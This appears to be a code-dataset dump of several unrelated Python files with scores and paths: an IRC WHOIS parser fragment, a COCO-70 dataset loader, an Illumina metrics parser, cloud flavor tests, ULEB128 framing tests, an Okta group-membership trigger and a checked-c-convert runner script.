obj.signon = int(signon)
elif line.command == RPL_WHOISACCOUNT:
obj.account = line.params[2]
elif line.command == RPL_WHOISCHANNELS:
channels = list(filter(bool, line.params[2].split(" ")))
if obj.channels is None:
obj.channels = []
for i, channel in enumerate(channels):
symbols = ""
while channel[0] in self.isupport.prefix.prefixes:
symbols += channel[0]
channel = channel[1:]
channel_user = ChannelUser(
Name(obj.nickname, folded),
Name(channel, self.casefold(channel))
)
for symbol in symbols:
mode = self.isupport.prefix.from_prefix(symbol)
if mode is not None:
channel_user.modes.add(mode)
obj.channels.append(channel_user)
elif line.command == RPL_ENDOFWHOIS:
return obj
return MaybeAwait(_assure) | 0.550728 | 0.075687 |
import os
from typing import Optional
from .imagelist import ImageList
from ._util import download as download_data, check_exits
class COCO70(ImageList):
"""COCO-70 dataset is a large-scale classification dataset (1000 images per class) created from
`COCO <https://cocodataset.org/>`_ Dataset.
It is used to explore the effect of fine-tuning with a large amount of data.
Args:
root (str): Root directory of dataset
split (str, optional): The dataset split, supports ``train``, or ``test``.
sample_rate (int): The sampling rates to sample random ``training`` images for each category.
Choices include 100, 50, 30, 15. Default: 100.
download (bool, optional): If true, downloads the dataset from the internet and puts it \
in root directory. If dataset is already downloaded, it is not downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image and returns a \
transformed version. E.g, :class:`torchvision.transforms.RandomCrop`.
target_transform (callable, optional): A function/transform that takes in the target and transforms it.
.. note:: In `root`, there will exist following files after downloading.
::
train/
test/
image_list/
train_100.txt
train_50.txt
train_30.txt
train_15.txt
test.txt
"""
download_list = [
("image_list", "image_list.zip", "https://cloud.tsinghua.edu.cn/f/d2ffb62fe3d140f1a73c/?dl=1"),
("train", "train.tgz", "https://cloud.tsinghua.edu.cn/f/e0dc4368342948c5bb2a/?dl=1"),
("test", "test.tgz", "https://cloud.tsinghua.edu.cn/f/59393a55c818429fb8d1/?dl=1"),
]
image_list = {
"train": "image_list/train_100.txt",
"train100": "image_list/train_100.txt",
"train50": "image_list/train_50.txt",
"train30": "image_list/train_30.txt",
"train15": "image_list/train_15.txt",
"test": "image_list/test.txt",
"test100": "image_list/test.txt",
}
CLASSES =['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck',
'boat', 'traffic_light', 'fire_hydrant', 'stop_sign', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella',
'handbag', 'tie', 'suitcase', 'skis', 'kite', 'baseball_bat', 'skateboard', 'surfboard',
'tennis_racket', 'bottle', 'wine_glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana',
'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot_dog', 'pizza', 'donut', 'cake',
'chair', 'couch', 'potted_plant', 'bed', 'dining_table', 'toilet', 'tv', 'laptop',
'remote', 'keyboard', 'cell_phone', 'microwave', 'oven', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'teddy_bear']
def __init__(self, root: str, split: str, sample_rate: Optional[int] =100, download: Optional[bool] = False, **kwargs):
if split == 'train':
list_name = 'train' + str(sample_rate)
assert list_name in self.image_list
data_list_file = os.path.join(root, self.image_list[list_name])
else:
data_list_file = os.path.join(root, self.image_list['test'])
if download:
list(map(lambda args: download_data(root, *args), self.download_list))
else:
list(map(lambda file_name, _: check_exits(root, file_name), self.download_list))
super(COCO70, self).__init__(root, COCO70.CLASSES, data_list_file=data_list_file, **kwargs) | common/vision/datasets/coco70.py | import os
from typing import Optional
from .imagelist import ImageList
from ._util import download as download_data, check_exits
class COCO70(ImageList):
"""COCO-70 dataset is a large-scale classification dataset (1000 images per class) created from
`COCO <https://cocodataset.org/>`_ Dataset.
It is used to explore the effect of fine-tuning with a large amount of data.
Args:
root (str): Root directory of dataset
split (str, optional): The dataset split, supports ``train``, or ``test``.
sample_rate (int): The sampling rates to sample random ``training`` images for each category.
Choices include 100, 50, 30, 15. Default: 100.
download (bool, optional): If true, downloads the dataset from the internet and puts it \
in root directory. If dataset is already downloaded, it is not downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image and returns a \
transformed version. E.g, :class:`torchvision.transforms.RandomCrop`.
target_transform (callable, optional): A function/transform that takes in the target and transforms it.
.. note:: In `root`, there will exist following files after downloading.
::
train/
test/
image_list/
train_100.txt
train_50.txt
train_30.txt
train_15.txt
test.txt
"""
download_list = [
("image_list", "image_list.zip", "https://cloud.tsinghua.edu.cn/f/d2ffb62fe3d140f1a73c/?dl=1"),
("train", "train.tgz", "https://cloud.tsinghua.edu.cn/f/e0dc4368342948c5bb2a/?dl=1"),
("test", "test.tgz", "https://cloud.tsinghua.edu.cn/f/59393a55c818429fb8d1/?dl=1"),
]
image_list = {
"train": "image_list/train_100.txt",
"train100": "image_list/train_100.txt",
"train50": "image_list/train_50.txt",
"train30": "image_list/train_30.txt",
"train15": "image_list/train_15.txt",
"test": "image_list/test.txt",
"test100": "image_list/test.txt",
}
CLASSES =['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck',
'boat', 'traffic_light', 'fire_hydrant', 'stop_sign', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella',
'handbag', 'tie', 'suitcase', 'skis', 'kite', 'baseball_bat', 'skateboard', 'surfboard',
'tennis_racket', 'bottle', 'wine_glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana',
'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot_dog', 'pizza', 'donut', 'cake',
'chair', 'couch', 'potted_plant', 'bed', 'dining_table', 'toilet', 'tv', 'laptop',
'remote', 'keyboard', 'cell_phone', 'microwave', 'oven', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'teddy_bear']
def __init__(self, root: str, split: str, sample_rate: Optional[int] =100, download: Optional[bool] = False, **kwargs):
if split == 'train':
list_name = 'train' + str(sample_rate)
assert list_name in self.image_list
data_list_file = os.path.join(root, self.image_list[list_name])
else:
data_list_file = os.path.join(root, self.image_list['test'])
if download:
list(map(lambda args: download_data(root, *args), self.download_list))
else:
list(map(lambda file_name, _: check_exits(root, file_name), self.download_list))
super(COCO70, self).__init__(root, COCO70.CLASSES, data_list_file=data_list_file, **kwargs) | 0.822653 | 0.459986 |
import pandas
from bitstring import ReadError
from .base_parser_class import InteropBinParser
class InteropControlMetrics(InteropBinParser):
__version = 0.1
supported_versions = [1]
codename = 'control'
def _init_variables(self):
self.data = { 'lane': [],
'tile': [],
'read': [],
'control_str': [],
'index_str': [],
'clusters': []
}
def parse_binary(self):
bs = self.bs
# Control Metrics (ControlMetricsOut.bin)
# Contains pull out information for Illumina in-line sample controls
# Format:
# byte 0: file version number (1) bytes (variable length): record:
# 2 bytes: lane number (uint16)
# 2 bytes: tile number (uint16)
# 2 bytes: read number (uint16)
# 2 bytes: number bytes X for control name(uint16)
# X bytes: control name string (string in UTF8Encoding)
# 2 bytes: number bytes Y for index name(uint16)
# Y bytes: index name string (string in UTF8Encoding)
# 4 bytes: num of clusters identified as control (uint32)
self.apparent_file_version = bs.read('uintle:8') # version number of binary
self.check_version(self.apparent_file_version)
try:
while True:
self.data['lane'].append(bs.read('uintle:16'))
self.data['tile'].append(bs.read('uintle:16'))
self.data['read'].append(bs.read('uintle:16'))
# next 2 bytes: expected control name length in bytes.
nextbytes = bs.read('uintle:16')
self.data['control_str'].append(bs.read('bytes:%i' % (nextbytes)))
# next 2 bytes: expected index name length in bytes.
nextbytes = bs.read('uintle:16')
self.data['index_str'].append(bs.read('bytes:%i' % (nextbytes)))
self.data['clusters'].append(bs.read('uintle:32'))
except ReadError:
pass
self.df = pandas.DataFrame(self.data)
def __str__(self):
#TODO: to_str (improve output)
out = "%s\n" % self.df.head()
return out
if __name__=='__main__':
import sys
try:
filename = sys.argv[1]
except:
print( "supply path to ExtractionMetrics.bin" )
sys.exit()
CM = InteropControlMetrics(filename)
print(CM) | illuminate/control_metrics.py |
import pandas
from bitstring import ReadError
from .base_parser_class import InteropBinParser
class InteropControlMetrics(InteropBinParser):
__version = 0.1
supported_versions = [1]
codename = 'control'
def _init_variables(self):
self.data = { 'lane': [],
'tile': [],
'read': [],
'control_str': [],
'index_str': [],
'clusters': []
}
def parse_binary(self):
bs = self.bs
# Control Metrics (ControlMetricsOut.bin)
# Contains pull out information for Illumina in-line sample controls
# Format:
# byte 0: file version number (1) bytes (variable length): record:
# 2 bytes: lane number (uint16)
# 2 bytes: tile number (uint16)
# 2 bytes: read number (uint16)
# 2 bytes: number bytes X for control name(uint16)
# X bytes: control name string (string in UTF8Encoding)
# 2 bytes: number bytes Y for index name(uint16)
# Y bytes: index name string (string in UTF8Encoding)
# 4 bytes: num of clusters identified as control (uint32)
self.apparent_file_version = bs.read('uintle:8') # version number of binary
self.check_version(self.apparent_file_version)
try:
while True:
self.data['lane'].append(bs.read('uintle:16'))
self.data['tile'].append(bs.read('uintle:16'))
self.data['read'].append(bs.read('uintle:16'))
# next 2 bytes: expected control name length in bytes.
nextbytes = bs.read('uintle:16')
self.data['control_str'].append(bs.read('bytes:%i' % (nextbytes)))
# next 2 bytes: expected index name length in bytes.
nextbytes = bs.read('uintle:16')
self.data['index_str'].append(bs.read('bytes:%i' % (nextbytes)))
self.data['clusters'].append(bs.read('uintle:32'))
except ReadError:
pass
self.df = pandas.DataFrame(self.data)
def __str__(self):
#TODO: to_str (improve output)
out = "%s\n" % self.df.head()
return out
if __name__=='__main__':
import sys
try:
filename = sys.argv[1]
except:
print( "supply path to ExtractionMetrics.bin" )
sys.exit()
CM = InteropControlMetrics(filename)
print(CM) | 0.390011 | 0.22448 |
from cafe.drivers.unittest.decorators import tags
from cloudcafe.common.tools.datagen import rand_name
from cloudcafe.compute.common.exceptions import BadRequest, ItemNotFound
from cloudroast.compute.fixtures import ComputeAdminFixture
class DeleteFlavorTest(ComputeAdminFixture):
@classmethod
def setUpClass(cls):
"""
Perform actions that setup the necessary resources for testing
The following resources are created during this setup:
- A public flavor with a name starting with 'flavor', 64MB of RAM,
1 vcpu, 10GB disk space
The created flavor is then deleted.
"""
super(DeleteFlavorTest, cls).setUpClass()
cls.flavor_name = rand_name('flavor')
cls.flavor = cls.admin_flavors_client.create_flavor(
name=cls.flavor_name, ram='64', vcpus='1', disk='10',
is_public=True).entity
cls.admin_flavors_client.delete_flavor(cls.flavor.id)
@tags(type='positive', net='no')
def test_get_deleted_flavor(self):
"""
Perform actions that allow for the cleanup of any generated resources
Validate that the detailed information of the flavor created and
deleted during setup can be accessed.
"""
self.admin_flavors_client.get_flavor_details(self.flavor.id)
@tags(type='negative', net='no')
def test_create_server_from_deleted_flavor(self):
"""
Test that a deleted flavor cannot be used to create an instance
Validate that you receive an 'Bad Request' error when a user attempts
to create an instance with a flavor created and deleted during setup.
The following assertions occur:
- The create instance requests raises a 'Bad Request' error
"""
with self.assertRaises(BadRequest):
self.server_behaviors.create_active_server(
flavor_ref=self.flavor.id)
@tags(type='negative', net='no')
def test_delete_deleted_flavor_fails(self):
"""
Test that a previously deleted flavor cannot be deleted
Validate that you receive an 'Item Not Found' error when a user
attempts to delete the flavor that was created and deleted during
setup.
The following assertions occur:
- The delete flavor requests raises a 'Item not Found' error
"""
with self.assertRaises(ItemNotFound):
self.admin_flavors_client.delete_flavor(self.flavor.id) | cloudroast/compute/admin_api/flavors/test_delete_flavor.py | from cafe.drivers.unittest.decorators import tags
from cloudcafe.common.tools.datagen import rand_name
from cloudcafe.compute.common.exceptions import BadRequest, ItemNotFound
from cloudroast.compute.fixtures import ComputeAdminFixture
class DeleteFlavorTest(ComputeAdminFixture):
@classmethod
def setUpClass(cls):
"""
Perform actions that setup the necessary resources for testing
The following resources are created during this setup:
- A public flavor with a name starting with 'flavor', 64MB of RAM,
1 vcpu, 10GB disk space
The created flavor is then deleted.
"""
super(DeleteFlavorTest, cls).setUpClass()
cls.flavor_name = rand_name('flavor')
cls.flavor = cls.admin_flavors_client.create_flavor(
name=cls.flavor_name, ram='64', vcpus='1', disk='10',
is_public=True).entity
cls.admin_flavors_client.delete_flavor(cls.flavor.id)
@tags(type='positive', net='no')
def test_get_deleted_flavor(self):
"""
Perform actions that allow for the cleanup of any generated resources
Validate that the detailed information of the flavor created and
deleted during setup can be accessed.
"""
self.admin_flavors_client.get_flavor_details(self.flavor.id)
@tags(type='negative', net='no')
def test_create_server_from_deleted_flavor(self):
"""
Test that a deleted flavor cannot be used to create an instance
Validate that you receive an 'Bad Request' error when a user attempts
to create an instance with a flavor created and deleted during setup.
The following assertions occur:
- The create instance requests raises a 'Bad Request' error
"""
with self.assertRaises(BadRequest):
self.server_behaviors.create_active_server(
flavor_ref=self.flavor.id)
@tags(type='negative', net='no')
def test_delete_deleted_flavor_fails(self):
"""
Test that a previously deleted flavor cannot be deleted
Validate that you receive an 'Item Not Found' error when a user
attempts to delete the flavor that was created and deleted during
setup.
The following assertions occur:
- The delete flavor requests raises a 'Item not Found' error
"""
with self.assertRaises(ItemNotFound):
self.admin_flavors_client.delete_flavor(self.flavor.id) | 0.741206 | 0.308229 |
from __future__ import absolute_import, division, print_function, unicode_literals
from itertools import chain
from nose.tools import eq_, raises
from six.moves import xrange
from smarkets.streaming_api.framing import (
frame_decode_all, frame_encode, IncompleteULEB128, uleb128_decode, uleb128_encode,
)
test_data = (
(0x00000000, b'\x00'),
(0x0000007F, b'\x7F'),
(0x00000080, b'\x80\x01'),
(624485, b'\xE5\x8E\x26'),
(268435202, b'\x82\xFE\xFF\x7F'),
)
def test_dumps():
for value, string in test_data:
yield check_dumps, value, string
def check_dumps(value, string):
eq_(uleb128_encode(value), string)
def test_loads():
for value, string in test_data:
yield check_loads, bytearray(string), value
def check_loads(byte_array, value):
eq_(uleb128_decode(byte_array), (value, len(byte_array)))
def test_loads_and_dumps_are_consistent():
for i in chain(
xrange(2 ** 18),
xrange(2 ** 20, 2 ** 26, 33333),
xrange(2 ** 26, 2 ** 32, 777777),
):
byte_dump = uleb128_encode(i)
eq_(uleb128_decode(byte_dump), (i, len(byte_dump)))
@raises(ValueError)
def test_uleb128_encode_fails_on_negative_number():
uleb128_encode(-1)
def test_uleb128_decode_fails_on_invalid_input():
byte_array = uleb128_encode(12345678)
for i in xrange(len(byte_array)):
yield check_uleb128_decode_fails_on_invalid_input, byte_array[:i]
@raises(IncompleteULEB128)
def check_uleb128_decode_fails_on_invalid_input(input_):
uleb128_decode(input_)
def test_frame_encode():
for input_, output in (
(b'', b'\x00\x00\x00\x00'),
(b'a', b'\x01a\x00\x00'),
(b'ab', b'\x02ab\x00'),
(b'abc', b'\x03abc'),
(b'abcd', b'\x04abcd'),
):
yield check_frame_encode, bytearray(input_), output
def check_frame_encode(byte_array, output):
frame = bytearray()
frame_encode(frame, byte_array)
eq_(frame, output)
def test_frame_decode_all():
for input_, output in (
# frame matches the boundary
(b'', ([], b'')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd', ([b'a', b'ab', b'abc', b'abcd'], b'')),
# ends with complete header but only part of a message
(b'\x03ab', ([], b'\x03ab')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd\x03ab', ([b'a', b'ab', b'abc', b'abcd'], b'\x03ab')),
(b'\x05abcd', ([], b'\x05abcd')),
# ends with incomplete header
(b'\x80', ([], b'\x80')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd\x03ab', ([b'a', b'ab', b'abc', b'abcd'], b'\x03ab')),
# 4(or more)-byte incomplete header is a special case because it reaches the minimum frame size
# so let's make sure decoding doesn't fail at header decoding stage
(b'\x80\x80\x80\x80', ([], b'\x80\x80\x80\x80')),
(b'\x80\x80\x80\x80\x80', ([], b'\x80\x80\x80\x80\x80')),
# regression: if the second frame is shorter, we still want to decode both...
(b'\x05abcde\x03abc', ([b'abcde', b'abc'], b'')),
):
yield check_frame_decode_all, bytearray(input_), output
def check_frame_decode_all(byte_array, output):
eq_(frame_decode_all(byte_array), output) | smarkets/tests/streaming_api/framing.py | from __future__ import absolute_import, division, print_function, unicode_literals
from itertools import chain
from nose.tools import eq_, raises
from six.moves import xrange
from smarkets.streaming_api.framing import (
frame_decode_all, frame_encode, IncompleteULEB128, uleb128_decode, uleb128_encode,
)
test_data = (
(0x00000000, b'\x00'),
(0x0000007F, b'\x7F'),
(0x00000080, b'\x80\x01'),
(624485, b'\xE5\x8E\x26'),
(268435202, b'\x82\xFE\xFF\x7F'),
)
def test_dumps():
for value, string in test_data:
yield check_dumps, value, string
def check_dumps(value, string):
eq_(uleb128_encode(value), string)
def test_loads():
for value, string in test_data:
yield check_loads, bytearray(string), value
def check_loads(byte_array, value):
eq_(uleb128_decode(byte_array), (value, len(byte_array)))
def test_loads_and_dumps_are_consistent():
for i in chain(
xrange(2 ** 18),
xrange(2 ** 20, 2 ** 26, 33333),
xrange(2 ** 26, 2 ** 32, 777777),
):
byte_dump = uleb128_encode(i)
eq_(uleb128_decode(byte_dump), (i, len(byte_dump)))
@raises(ValueError)
def test_uleb128_encode_fails_on_negative_number():
uleb128_encode(-1)
def test_uleb128_decode_fails_on_invalid_input():
byte_array = uleb128_encode(12345678)
for i in xrange(len(byte_array)):
yield check_uleb128_decode_fails_on_invalid_input, byte_array[:i]
@raises(IncompleteULEB128)
def check_uleb128_decode_fails_on_invalid_input(input_):
uleb128_decode(input_)
def test_frame_encode():
for input_, output in (
(b'', b'\x00\x00\x00\x00'),
(b'a', b'\x01a\x00\x00'),
(b'ab', b'\x02ab\x00'),
(b'abc', b'\x03abc'),
(b'abcd', b'\x04abcd'),
):
yield check_frame_encode, bytearray(input_), output
def check_frame_encode(byte_array, output):
frame = bytearray()
frame_encode(frame, byte_array)
eq_(frame, output)
def test_frame_decode_all():
for input_, output in (
# frame matches the boundary
(b'', ([], b'')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd', ([b'a', b'ab', b'abc', b'abcd'], b'')),
# ends with complete header but only part of a message
(b'\x03ab', ([], b'\x03ab')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd\x03ab', ([b'a', b'ab', b'abc', b'abcd'], b'\x03ab')),
(b'\x05abcd', ([], b'\x05abcd')),
# ends with incomplete header
(b'\x80', ([], b'\x80')),
(b'\x01a\x00\x00\x02ab\x00\x03abc\x04abcd\x03ab', ([b'a', b'ab', b'abc', b'abcd'], b'\x03ab')),
# 4(or more)-byte incomplete header is a special case because it reaches the minimum frame size
# so let's make sure decoding doesn't fail at header decoding stage
(b'\x80\x80\x80\x80', ([], b'\x80\x80\x80\x80')),
(b'\x80\x80\x80\x80\x80', ([], b'\x80\x80\x80\x80\x80')),
# regression: if the second frame is shorter, we still want to decode both...
(b'\x05abcde\x03abc', ([b'abcde', b'abc'], b'')),
):
yield check_frame_decode_all, bytearray(input_), output
def check_frame_decode_all(byte_array, output):
eq_(frame_decode_all(byte_array), output) | 0.736685 | 0.30641 |
import komand
import time
from .schema import UsersAddedRemovedFromGroupInput, UsersAddedRemovedFromGroupOutput, Input, Output, Component
# Custom imports below
from komand.exceptions import PluginException
from komand_okta.util import helpers
class UsersAddedRemovedFromGroup(komand.Trigger):
def __init__(self):
super(self.__class__, self).__init__(
name='users_added_removed_from_group',
description=Component.DESCRIPTION,
input=UsersAddedRemovedFromGroupInput(),
output=UsersAddedRemovedFromGroupOutput())
def run(self, params={}):
"""Run the trigger"""
group_list = params.get(Input.GROUP_IDS)
okta_url = self.connection.okta_url
current_list = list()
group_names = list()
for group in group_list:
api = f"{okta_url}/api/v1/groups/{group}/users"
# Build a reference list to check for updates against
response = self.connection.session.get(api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double-check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
data = komand.helper.clean(data)
current_list.append({group: data})
# Get group names
group_name_api = f"{okta_url}/api/v1/groups/{group}"
response = self.connection.session.get(group_name_api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
group_names.append(data["profile"]["name"])
while True:
new_list = list()
for group in group_list:
api = f"{okta_url}/api/v1/groups/{group}/users"
response = self.connection.session.get(api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
data = komand.helper.clean(data)
new_list.append({group: data})
added = list()
removed = list()
for index, value in enumerate(group_list):
# Find added group members
added_users = []
for new_user in new_list[index][value]:
found = False
for old_user in current_list[index][value]:
if new_user["id"] == old_user["id"]:
found = True
if not found:
added_users.append(new_user)
# Find removed group members
removed_users = []
for old_user in current_list[index][value]:
found = False
for new_user in new_list[index][value]:
if old_user["id"] == new_user["id"]:
found = True
if not found:
removed_users.append(old_user)
if added_users:
added.append({"group_name": group_names[index], "group_id": value, "users": added_users})
if removed_users:
removed.append({"group_name": group_names[index], "group_id": value, "users": removed_users})
if added and removed:
self.logger.info("Users added and removed, sending to orchestrator.")
self.send({Output.USERS_ADDED_FROM_GROUPS: added, Output.USERS_REMOVED_FROM_GROUPS: removed})
elif added and not removed:
self.logger.info("Users added, sending to orchestrator.")
self.send({Output.USERS_ADDED_FROM_GROUPS: added, Output.USERS_REMOVED_FROM_GROUPS: []})
elif removed and not added:
self.logger.info("Users removed, sending to orchestrator.")
self.send({Output.USERS_REMOVED_FROM_GROUPS: removed, Output.USERS_ADDED_FROM_GROUPS: []})
current_list = new_list
sleep_time = params.get(Input.INTERVAL, 300)
self.logger.info(f"Loop complete, sleeping for {sleep_time}...")
time.sleep(sleep_time) | okta/komand_okta/triggers/users_added_removed_from_group/trigger.py | import komand
import time
from .schema import UsersAddedRemovedFromGroupInput, UsersAddedRemovedFromGroupOutput, Input, Output, Component
# Custom imports below
from komand.exceptions import PluginException
from komand_okta.util import helpers
class UsersAddedRemovedFromGroup(komand.Trigger):
def __init__(self):
super(self.__class__, self).__init__(
name='users_added_removed_from_group',
description=Component.DESCRIPTION,
input=UsersAddedRemovedFromGroupInput(),
output=UsersAddedRemovedFromGroupOutput())
def run(self, params={}):
"""Run the trigger"""
group_list = params.get(Input.GROUP_IDS)
okta_url = self.connection.okta_url
current_list = list()
group_names = list()
for group in group_list:
api = f"{okta_url}/api/v1/groups/{group}/users"
# Build a reference list to check for updates against
response = self.connection.session.get(api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double-check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
data = komand.helper.clean(data)
current_list.append({group: data})
# Get group names
group_name_api = f"{okta_url}/api/v1/groups/{group}"
response = self.connection.session.get(group_name_api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
group_names.append(data["profile"]["name"])
while True:
new_list = list()
for group in group_list:
api = f"{okta_url}/api/v1/groups/{group}/users"
response = self.connection.session.get(api)
try:
data = response.json()
except ValueError:
raise PluginException(cause='Returned data was not in JSON format.',
assistance="Double check that group ID's are all valid.",
data=response.text)
helpers.raise_based_on_error_code(response)
data = komand.helper.clean(data)
new_list.append({group: data})
added = list()
removed = list()
for index, value in enumerate(group_list):
# Find added group members
added_users = []
for new_user in new_list[index][value]:
found = False
for old_user in current_list[index][value]:
if new_user["id"] == old_user["id"]:
found = True
if not found:
added_users.append(new_user)
# Find removed group members
removed_users = []
for old_user in current_list[index][value]:
found = False
for new_user in new_list[index][value]:
if old_user["id"] == new_user["id"]:
found = True
if not found:
removed_users.append(old_user)
if added_users:
added.append({"group_name": group_names[index], "group_id": value, "users": added_users})
if removed_users:
removed.append({"group_name": group_names[index], "group_id": value, "users": removed_users})
if added and removed:
self.logger.info("Users added and removed, sending to orchestrator.")
self.send({Output.USERS_ADDED_FROM_GROUPS: added, Output.USERS_REMOVED_FROM_GROUPS: removed})
elif added and not removed:
self.logger.info("Users added, sending to orchestrator.")
self.send({Output.USERS_ADDED_FROM_GROUPS: added, Output.USERS_REMOVED_FROM_GROUPS: []})
elif removed and not added:
self.logger.info("Users removed, sending to orchestrator.")
self.send({Output.USERS_REMOVED_FROM_GROUPS: removed, Output.USERS_ADDED_FROM_GROUPS: []})
current_list = new_list
sleep_time = params.get(Input.INTERVAL, 300)
self.logger.info(f"Loop complete, sleeping for {sleep_time}...")
time.sleep(sleep_time) | 0.389663 | 0.113826 |
import re
import os
import json
import argparse
import traceback
import subprocess
"""
This tool will invoke checked-c-convert on a compile_commands.json database.
It contains some work-arounds for cmake+nmake generated compile_commands.json
files, where the files are malformed.
"""
SLASH = os.sep
# to separate multiple commands in a line
CMD_SEP = " ;"
DEFAULT_ARGS = ["-dump-stats", "-output-postfix=checked"]
if os.name == "nt":
DEFAULT_ARGS.append("-extra-arg-before=--driver-mode=cl")
CMD_SEP = " &"
def getCheckedCArgs(argument_list):
"""
Convert the compilation arguments (include folder and #defines)
to checked C format.
:param argument_list: list of compiler argument.
:return: argument string
"""
clang_x_args = []
for curr_arg in argument_list:
if curr_arg.startswith("-D") or curr_arg.startswith("-I"):
clang_x_args.append('-extra-arg=' + curr_arg)
return clang_x_args
def tryFixUp(s):
"""
Fix-up for a failure between cmake and nmake.
"""
b = open(s, 'r').read()
b = re.sub(r'@<<\n', "", b)
b = re.sub(r'\n<<', "", b)
f = open(s, 'w')
f.write(b)
f.close()
return
def runMain(args):
runs = 0
cmds = None
while runs < 2:
runs = runs + 1
try:
cmds = json.load(open(args.compile_commands, 'r'))
except:
traceback.print_exc()
tryFixUp(args.compile_commands)
if cmds == None:
print "failed"
return
s = set()
for i in cmds:
file_to_add = i['file']
compiler_args = ""
target_directory = ""
if file_to_add.endswith(".cpp"):
continue # Checked C extension doesn't support cpp files yet
# BEAR uses relative paths for 'file' rather than absolute paths. It also
# has a field called 'arguments' instead of 'command' in the cmake style.
# Use that to detect BEAR and add the directory.
if 'arguments' in i and not 'command' in i:
# BEAR. Need to add directory.
file_to_add = i['directory'] + SLASH + file_to_add
# get the compiler arguments
compiler_args = getCheckedCArgs(i["arguments"])
# get the directory used during compilation.
target_directory = i['directory']
file_to_add = os.path.realpath(file_to_add)
s.add((frozenset(compiler_args), target_directory, file_to_add))
prog_name = args.prog_name
f = open('convert.sh', 'w')
for compiler_args, target_directory, src_file in s:
args = []
# get the command to change the working directory
change_dir_cmd = ""
if len(target_directory) > 0:
change_dir_cmd = "cd " + target_directory + CMD_SEP
else:
# default working directory
target_directory = os.getcwd()
args.append(prog_name)
if len(compiler_args) > 0:
args.extend(list(compiler_args))
args.extend(DEFAULT_ARGS)
args.append(src_file)
print str(args)
subprocess.check_call(args, cwd=target_directory)
# prepend the command to change the working directory.
if len(change_dir_cmd) > 0:
args = [change_dir_cmd] + args
f.write(" \\\n".join(args))
f.write("\n")
f.close()
return
if __name__ == '__main__':
parser = argparse.ArgumentParser("runner")
parser.add_argument("compile_commands", type=str)
parser.add_argument("prog_name", type=str)
args = parser.parse_args()
runMain(args) | tools/checked-c-convert/utils/convert-commands.py | import re
import os
import json
import argparse
import traceback
import subprocess
"""
This tool will invoke checked-c-convert on a compile_commands.json database.
It contains some work-arounds for cmake+nmake generated compile_commands.json
files, where the files are malformed.
"""
SLASH = os.sep
# to separate multiple commands in a line
CMD_SEP = " ;"
DEFAULT_ARGS = ["-dump-stats", "-output-postfix=checked"]
if os.name == "nt":
DEFAULT_ARGS.append("-extra-arg-before=--driver-mode=cl")
CMD_SEP = " &"
def getCheckedCArgs(argument_list):
"""
Convert the compilation arguments (include folder and #defines)
to checked C format.
:param argument_list: list of compiler argument.
:return: argument string
"""
clang_x_args = []
for curr_arg in argument_list:
if curr_arg.startswith("-D") or curr_arg.startswith("-I"):
clang_x_args.append('-extra-arg=' + curr_arg)
return clang_x_args
def tryFixUp(s):
"""
Fix-up for a failure between cmake and nmake.
"""
b = open(s, 'r').read()
b = re.sub(r'@<<\n', "", b)
b = re.sub(r'\n<<', "", b)
f = open(s, 'w')
f.write(b)
f.close()
return
def runMain(args):
runs = 0
cmds = None
while runs < 2:
runs = runs + 1
try:
cmds = json.load(open(args.compile_commands, 'r'))
except:
traceback.print_exc()
tryFixUp(args.compile_commands)
if cmds == None:
print "failed"
return
s = set()
for i in cmds:
file_to_add = i['file']
compiler_args = ""
target_directory = ""
if file_to_add.endswith(".cpp"):
continue # Checked C extension doesn't support cpp files yet
# BEAR uses relative paths for 'file' rather than absolute paths. It also
# has a field called 'arguments' instead of 'command' in the cmake style.
# Use that to detect BEAR and add the directory.
if 'arguments' in i and not 'command' in i:
# BEAR. Need to add directory.
file_to_add = i['directory'] + SLASH + file_to_add
# get the compiler arguments
compiler_args = getCheckedCArgs(i["arguments"])
# get the directory used during compilation.
target_directory = i['directory']
file_to_add = os.path.realpath(file_to_add)
s.add((frozenset(compiler_args), target_directory, file_to_add))
prog_name = args.prog_name
f = open('convert.sh', 'w')
for compiler_args, target_directory, src_file in s:
args = []
# get the command to change the working directory
change_dir_cmd = ""
if len(target_directory) > 0:
change_dir_cmd = "cd " + target_directory + CMD_SEP
else:
# default working directory
target_directory = os.getcwd()
args.append(prog_name)
if len(compiler_args) > 0:
args.extend(list(compiler_args))
args.extend(DEFAULT_ARGS)
args.append(src_file)
print str(args)
subprocess.check_call(args, cwd=target_directory)
# prepend the command to change the working directory.
if len(change_dir_cmd) > 0:
args = [change_dir_cmd] + args
f.write(" \\\n".join(args))
f.write("\n")
f.close()
return
if __name__ == '__main__':
parser = argparse.ArgumentParser("runner")
parser.add_argument("compile_commands", type=str)
parser.add_argument("prog_name", type=str)
